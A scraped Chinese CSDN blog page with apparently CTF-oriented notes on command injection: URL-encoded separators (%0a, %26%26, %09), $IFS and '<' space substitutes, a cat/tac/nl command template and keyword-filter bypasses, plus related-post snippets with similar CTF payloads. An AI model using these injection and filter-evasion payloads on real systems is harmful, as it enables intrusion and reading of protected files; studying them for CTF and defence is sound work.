%20 %09 %0a等

已于 2022-12-09 14:42:38 修改
阅读量1.2w 收藏 23
点赞数 4
分类专栏: WEB安全理论 文章标签: 安全
于 2022-03-01 14:39:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_61778128/article/details/123205490
版权
本文探讨了URL编码在语句截断中的作用,如%09、%0a以及%26%26的使用,同时提到了命令注入的安全隐患,如利用'<'、'$IFS'等进行命令拼接。还介绍了防止文件名被过滤的策略,如双写过滤字符和直接过滤特定符号。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

按我的想法,%09用于语句中间,%0a可以做语句末尾的截断,此外 || &&(要进行url编码成%26%26) %26种也是可以进行末尾的截断的

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBATVVOR-S4nOmahQ==,size_20,color_FFFFFF,t_70,g_se,x_16

截断:

后面:&&(要进行url编码成%26%26) , || , %0a,

语句中:%09 , <(用于拼接命令,比如nl<fl??.php) , '' ,$IFS

命令:

c=[tac|cat|nl 等] [ |%09|$IFS|<|>] [../|./|/(目录)] [文件名] [%26| ‘||’ |%0a |%26%26(隔断符)]

文件名被过滤:

  • 替换为空字符:采用双写,比如过滤了flag 双写为flflagag

  • 直接过滤掉:1- \ 2-'' 3- %09 4-$IFS 5- '.' 6-< 7->

 

数据库语法整理及WAF绕过方式
RuoLi_s的博客
09-30 2554
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库。 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft Access, SQLite,MariaDB Oracle Oracle特性: select id,contents,time from news where news_id=1 ① union ② sele
python编译软件anocodate_python 图片base64编码和解码--大坑--↵和%0A
weixin_39640024的博客
02-21 4121
1 importbase642 from PIL importImage3 from io importBytesIO45 ##base64_data = '/9j/4AAQSkZJRgABAgAAAQABAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0a%0AHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zND...
async、await
Huang_DW的博客
09-06 196
ES2017 标准引入了 async 函数,使得异步操作变得更加方便 async/await场景 async主要来处理异步的操作, 需求:执行第一步,将执行第一步的结果返回给第二步使用。在ajax中先拿到一个接口的返回数据,后使用第一步返回的数据执行第二步操作的接口调用,达到异步操作。 这是一个用同步的思维来解决异步问题的方案,当前端接口调用需要等到接口返回值以后渲染页面时。 名词解释 async: async的用法,它作为一个关键字放到函数前面,用于表示函数是一个异步函数,因为async就是异步的意思,
iwebsec靶场(命令执行)
果粒程
03-03 570
iwebsec靶场(命令执行)
09字符串
lihonglei888的博客
06-06 331
字符串
%20与空格
basycai的博客
07-06 1万+
1.%20 %20是网页地址的空格符。html中的空格符是& nbsp;因为地址不能包含空格。它是序列化后的空格符。在url传递参数的时候,一般都会序列化一下,以保证参数的安全。2.路径获取问题String path=Parameter.class.getResource("").toString();//这个无法处理里面的空格。 System.out.println(path); //不可
php——09数字函数
lihaoen666的博客
03-28 312
取整 floor(值) 向下取整 ceil(值) 向上取整 幂运算 pow(底数,指数) 例子 // 输出2的3次方 echo pow(2,3); // 8 平方根 sqrt(数字) 例子 //输出4的平方根 echo sqrt(4); // 2 随机数 rand(start,end) 比较慢 mt_ra...
%0a可以做什么
weixin_30314631的博客
06-29 805
以通过这个正则表达式但是带入一个%0a,那么很好,漏洞就回到一个%0a能做什么上来了!黑锅已经总结了一个,在文件扩展后缀里1.php.jpg不能执行但是1.php.jpg%0a就可以了(linux环境下)另外如果在写文件的时候%0a就是一个新行了,对于数据库为文本的就是一个新记录还有呢?数据库在对待1和1%a的时候是不一样的,1%a被更新到一个int类型的字段可能会导致溢出...
前端encodeURI , decodeURI对字符串编码解码 , 以及把url中的%0A %20解码成换行和空格
热门推荐
weixin_49577940的博客
11-18 1万+
一 , 对字符串进行编码 var str = "岁月不居,时节如流" console.log(str); str = encodeURI(str) console.log("====编码之后===="); console.log(str); 控制台打印 二 ,对字符串进行解码 var str = "%E5%B2%81%E6%9C%88%E4%B8%8D%E5%B1%85%EF%BC%8C%E6%97%B6%E8%8A%82%E5%A6%...
mysql中的%_mysql入门
weixin_39765869的博客
01-25 1183
MySQL数据库1 数据库概念(了解)1.1 什么是数据库数据库就是用来存储和管理数据的仓库!数据库存储数据的优先:可存储大量数据;方便检索;保持数据的一致性、完整性;安全,可共享;通过组合分析,可产生新数据。1.2 数据库的发展历程没有数据库,使用磁盘文件存储数据;层次结构模型数据库;网状结构模型数据库;关系结构模型数据库:使用二维表格来存储数据;关系-对象模型数据库;MySQL就是关系型数据库...
java 中1%3c1%3c1_祥云杯2020 部分WriteUp
weixin_35886636的博客
02-25 1860
祥云杯Web★sign1%09||%09ls%09/1%09||%09ca\t%09in\dex.p\hp时有个闪1%09||find%09/%09-name%09`echo%09ZmxhKg==|base64%09-d`找flag1%09||ca\t%09/`echo%09L2V0Yy8uZmluZGZsYWcvZmxhZy50eHQ=|base64%09-d` ★flaskbot 写名字发现要...
sqoop导hive数据到mysql卡死在INFO mapreduce.Job: map 100% reduce 0%
大黄_sama
02-22 3122
       用sqoop将hive里面的数据导出到mysql里去,一种情况是mapreduce 程序卡住,INFO mapreduce.Job: map 100% reduce 0%       另一种情况是:报这个错误:java.sql.SQLException: Incorrect string value: '\xF0\x9F\x90\xBB' for column       经...
搞清楚字符编码09-万国码[5]
Sacredness的博客
07-21 598
这篇博客我们来介绍万国码实际存储编码中的utf-16与utf-32 utf-16是什么 utf-16是理论编码ucs4的一种实际存储编码 基本单元是2个字节 变长存储,存储BMP时长度是2个字节,存储的不是BMP时长度为4个字节. utf-16存储ucs4中的BMP 此时uft-16存储ucs4的情况就跟ucs-2存储ucs2的情况一模一样. utf-16存储大于BMP的ucs...
%0a php,%0a(换行符)的执行解析过程
weixin_42363600的博客
03-12 1121
test.php文件的代码如下://var a = "";//var a = "start_%0a_end";情况1:变量a的值是可控的,由参数input决定,所以,当从浏览器访问:http://127.0.0.1/test.php?input=start_%0a_end的时候查看网页源代码,结果如下://省略……//var a = start__end;//var a = "start_%0a_...
"%.9d\n" = "%09d\n"
weixin_30294021的博客
07-13 948
#include <stdio.h> int main(void) { int year = 05; printf("%09d\n",year); printf("%9d\n",year); printf("%.9d\n",year); return 0; } 输出结果: 000000005 ________5 000000005 测试环境:操作系...
php9跟09的区别,php – [0-9]和[0-9]之间有什么区别?
weixin_30296797的博客
03-12 325
PHP用于正则表达式的PCRE引擎支持 “possessive quantifiers”:Quantifiers followed by +are “possessive”. They eat as many characters as possible and don’t return to match the rest of the pattern. Thus .*a...
php代码换行运行,%0a(换行符)的执行解析过程
weixin_39814454的博客
03-10 538
test.php文件的代码如下://var a = "";//var a = "start_%0a_end";情况1:变量a的值是可控的,由参数input决定,所以,当从浏览器访问:http://127.0.0.1/test.php?input=start_%0a_end的时候查看网页源代码,结果如下://省略……//var a = start__end;//var a = "start_%0a_...
https://yuantu.houzi8.com/audio/original/2023/03/21/7fd0f9d5a42ec75a18054dba6526c312.mp3?sign=2ce16799dd09cd53083bec4e626132a9&t=647de2ff&attname=%E6%8A%92%E6%83%85%E8%88%92%E7%BC%93%E5%85%AC%E6%92%AD%E9%92%A2%E7%90%B4%E9%9F%B3%E4%B9%90%20by%20%E8%9C%A1%E7%AC%94%E5%B0%8F%E5%98%89-%E5%AE%8C%E6%95%B4%E7%89%88.mp3如何转化代码
最新发布
06-06
如果你需要在你的网页中嵌入这个音频链接,可以使用 HTML5 的 audio 元素,并设置其 src 属性为这个链接,例如: ```html <audio controls> <source src="https://yuantu.houzi8.com/audio/original/2023/03/21/7fd0f9d5a42ec75a18054dba6526c312.mp3?sign=2ce16799dd09cd53083bec4e626132a9&t=647de2ff&attname=%E6%8A%92%E6%83%85%E8%88%92%E7%BC%93%E5%85%AC%E6%92%AD%E9%92%A2%E7%90%B4%E9%9F%B3%E4%B9%90%20by%20%E8%9C%A1%E7%AC%94%E5%B0%8F%E5%98%89-%E5%AE%8C%E6%95%B4%E7%89%88.mp3" type="audio/mpeg"> Your browser does not support the audio element. </audio> ``` 上面的代码将在网页中嵌入一个音频播放器,并播放链接中的 MP3 音频文件。如果你需要修改音频播放器的样式,可以使用 CSS 对其进行样式化。
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

MUNG东隅

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值